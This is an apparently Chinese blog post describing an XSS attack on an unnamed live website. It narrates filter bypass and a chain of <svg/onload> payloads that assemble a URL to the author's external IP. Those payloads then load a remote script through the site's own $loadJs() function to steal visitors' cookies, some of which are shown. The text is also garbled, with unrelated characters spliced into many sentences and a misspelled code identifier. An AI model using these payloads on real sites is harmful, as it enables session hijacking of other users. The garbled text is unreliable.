關(guān)于如何被動(dòng)暫且不談
我只想說(shuō)xss真帥啊
1.好了不多說(shuō)了開(kāi)搞
2.要不開(kāi)始看圖吧
- xss的介紹我就不說(shuō)了
- 這次一次實(shí)戰(zhàn)演練
對(duì)于一個(gè)新手來(lái)說(shuō)必須要對(duì)xss挖掘有明確的思路
0x01:拿到一個(gè)站叁幢,必須要先去尋找這個(gè)站最有可能存在的xss(輸出點(diǎn))
![RS}G2ITC5VFZZD[{R~]AZX.png
![D90TDO4(P(VZ]J@FOH3(~LF.png](http://upload-images.jianshu.io/upload_images/2495234-28a6cfa024526959.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
0x02:然后構(gòu)造一個(gè)poc
0x03:觀(guān)察構(gòu)造的poc能否被觸發(fā)
1.如果可以觸發(fā)疚察,證明會(huì)有xss漏洞的存在鹊杖,
2.不能觸發(fā)冲簿,基本證明不存在xss漏洞
4.沒(méi)辦法繼續(xù)尋找可能存在xss的輸入點(diǎn)美旧,重復(fù)以上的操作尋找輸入點(diǎn)腰埂。
但是頁(yè)面并沒(méi)有觸發(fā)彈窗墓怀,猜想可能是過(guò)濾特殊標(biāo)簽<script>
你又防護(hù)罩典奉,我有激光炮欲逃,嘿嘿嘿~ 既然你可以然我輸入那就繼續(xù)構(gòu)造poc
![YVTWB}RC)]`BA609SP@@$30.png](http://upload-images.jianshu.io/upload_images/2495234-b6d3c33c35f78761.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
現(xiàn)在我們就來(lái)實(shí)現(xiàn)心中的夢(mèng)想鸠项,搞站了
遠(yuǎn)程加載js,獲取cookie
構(gòu)造Exploit,但是有字符長(zhǎng)度限制辅甥,所以尋找更短的payload
a=document.createElement('script');
a.src=xxx /你的遠(yuǎn)程js地址
document.head.append(child)
但是長(zhǎng)度依然超過(guò)限制
精短構(gòu)造
a=documnet;
b='script'
a.createElement(b) !!!已經(jīng)是最簡(jiǎn)短的 創(chuàng)建js標(biāo)簽
現(xiàn)在我們就要想酝润,既然需要 <script>標(biāo)簽,觀(guān)察這個(gè)網(wǎng)站自己是否加載了jQuery璃弄,But"滅有"
繼續(xù)觀(guān)察
接下來(lái)要销,就一起嘿嘿嘿?lài)D~~~
$loadJs() 對(duì)方網(wǎng)站的js api
重新構(gòu)造payload
<svg/onload="b='http://123'">
<svg/onload="b+='.123.23.23'">
<svg/onload="b+='/xx.js'">
<svg/onload="$loadJs(b)">
遠(yuǎn)程加載的js文件,自己搭建的外網(wǎng)ip
![B4P`DD69Q]BMJUUXW%YEEAV.png](http://upload-images.jianshu.io/upload_images/2495234-3d2b1c8b3e5a3c91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
要不要看一看cookie呀~~
豬吟~
以上只是部分Cookie夏块,涉及敏感信息疏咐。
以后多有文章纤掸,現(xiàn)在是起步中,共同學(xué)習(xí)浑塞。